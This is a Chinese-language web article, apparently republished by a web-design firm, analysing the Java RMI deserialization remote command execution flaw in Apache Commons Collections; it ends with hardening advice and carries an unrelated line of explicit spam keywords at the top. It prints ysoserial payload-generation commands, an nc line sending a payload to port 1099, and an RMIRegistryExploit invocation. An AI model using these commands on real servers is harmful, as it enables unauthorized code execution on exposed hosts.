免费观看又色又爽又黄的小说免费_美女福利视频国产片_亚洲欧美精品_美国一级大黄大色毛片

JAVA反序列化中Rmi命令執行漏洞的分析

本篇文章給大家分享的是有關JAVA反序列化中Rmi命令執行漏洞的分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

讓客戶滿意是我們工作的目標,不斷超越客戶的期望值來自于我們對這個行業的熱愛。我們立志把好的技術通過有效、簡單的方式提供給客戶,將通過不懈努力成為客戶在信息化領域值得信任、有價值的長期合作伙伴,公司提供的服務項目有:域名注冊、虛擬空間、營銷軟件、網站建設、玉林網站維護、網站推廣。

1       概述

早在2015年的1月28號,Gabriel Lawrence和Chris Frohoff在AppSecCali上給出了一個報告,報告中介紹了Java反序列化漏洞可以利用Apache Commons Collections這個常用的Java庫來實現任意代碼執行,但當時并沒有引起太大的關注。后來FoxGlove Security安全團隊發布了一篇長博客,闡述了利用Java反序列化和Apache Commons Collections這一基礎類庫實現遠程命令執行的真實案例,各大Java Web Server紛紛躺槍,這個漏洞橫掃WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版,當時各大src平臺已被該漏洞刷屏,漏洞鋪天蓋地而來。

針對這個"2015年最被低估"的漏洞,各大受影響的Java應用廠商陸續發布了修復后的版本,Apache Commons Collections項目也對存在漏洞的類庫進行了一定的安全處理,但是網絡上仍有大量網站受此漏洞影響。本次討論的對象是JAVA RMI反序列化遠程命令執行漏洞。

2       何為java RMI

RMI是REMOTE METHODINVOCATION的簡稱,是J2SE的一部分,能夠讓程序員開發出基于JAVA的分布式應用。一個RMI對象是一個遠程JAVA對象,可以從另一個JAVA虛擬機上(甚至跨過網絡)調用它的方法,可以像調用本地JAVA對象的方法一樣調用遠程對象的方法,使分布在不同的JVM中的對象的外表和行為都像本地對象一樣。對于任何一個以對象為參數的RMI接口,你都可以發一個自己構建的對象,迫使服務器端將這個對象按任何一個存在于class path中的可序列化類來反序列化。

Java rmi遠程調用如下:

RMI遠程調用步驟:

JAVA反序列化中Rmi命令執行漏洞的分析

l 客戶對象調用客戶端輔助對象上的方法

l 客戶端輔助對象打包調用信息(變量,方法名),通過網絡發送給服務端輔助對象

l 服務端輔助對象將客戶端輔助對象發送來的信息解包,找出真正被調用的方法以及該方法所在對象

l 調用真正服務對象上的真正方法,并將結果返回給服務端輔助對象

l 服務端輔助對象將結果打包,發送給客戶端輔助對象

l 客戶端輔助對象將返回值解包,返回給客戶對象

l 客戶對象獲得返回值

3       Java Rmi命令執行是什么

1099端口是Java RMI的默認端口,RMI默認使用序列化來完成所有的交互,所以這是非常常見的漏洞。如果該端口暴露在公網上,且使用了Apache Commons Collections的漏洞版本,就可以在該服務器上執行相關命令。此處嘗試利用ysoserial進行漏洞分析。

JAVA反序列化中Rmi命令執行漏洞的分析

利用Java中Proxy的形式對攻擊payload進行封裝,并在對Proxy實現重新封裝的過程中使用了大量的泛類型,使得payload可以應對不同的應用。

利用該漏洞可在服務器上執行相關命令,此處舉例如下

$ java -jar ysoserial.jar CommonsCollections1 calc.exe |xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl

0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A

0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat

0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov

0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........

0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

$ nc xx.xx.xx.xx 1099 < groovypayload.bin

$ java -cp ysoserial.jarysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

利用該漏洞查看相關datasource文件內容

RMI服務的攻擊,同樣可以使用URLClassLoader方法進行回顯

4       Java Rmi當前漏洞影響

雖然Java RMI服務遠程命令執行漏洞過去了4年的時間,但是公網上依然有很多服務器存在該漏洞,此處對國內1099的端口開放情況做了初步統計,具體結果如下:

JAVA反序列化中Rmi命令執行漏洞的分析JAVA反序列化中Rmi命令執行漏洞的分析

JAVA反序列化中Rmi命令執行漏洞的分析

JAVA反序列化中Rmi命令執行漏洞的分析

通過對簡單掃描結果進行統計發現,1099端口中國開放12310臺,其中將端口用于RMI交互的主機3891臺,占比31.6%;存在反序列化漏洞3114臺,占比 25.29%。

5       加固意見

?  關閉rmi服務的端口在公網的開放;

?  下載SerialKiller臨時補丁,這個jar后放置于classpath,將應用代碼中的java.io.ObjectInputStream替換為SerialKiller,之后配置讓其能夠允許或禁用一些存在問題的類,SerialKiller有Hot-Reload,Whitelisting,Blacklisting幾個特性,控制了外部輸入反序列化后的可信類型

?  在不影響業務的情況下,臨時刪除掉項目里的InvokerTransformer.class文件;

?  定時對WebLogic、Apache、JBoss等中間件進行升級。

以上就是JAVA反序列化中Rmi命令執行漏洞的分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注創新互聯行業資訊頻道。

網站題目:JAVA反序列化中Rmi命令執行漏洞的分析
分享URL:http://m.newbst.com/article6/jicpig.html

成都網站建設公司_創新互聯,為您提供用戶體驗、App開發軟件開發網站建設、ChatGPT、網站制作

廣告

聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯

成都網站建設公司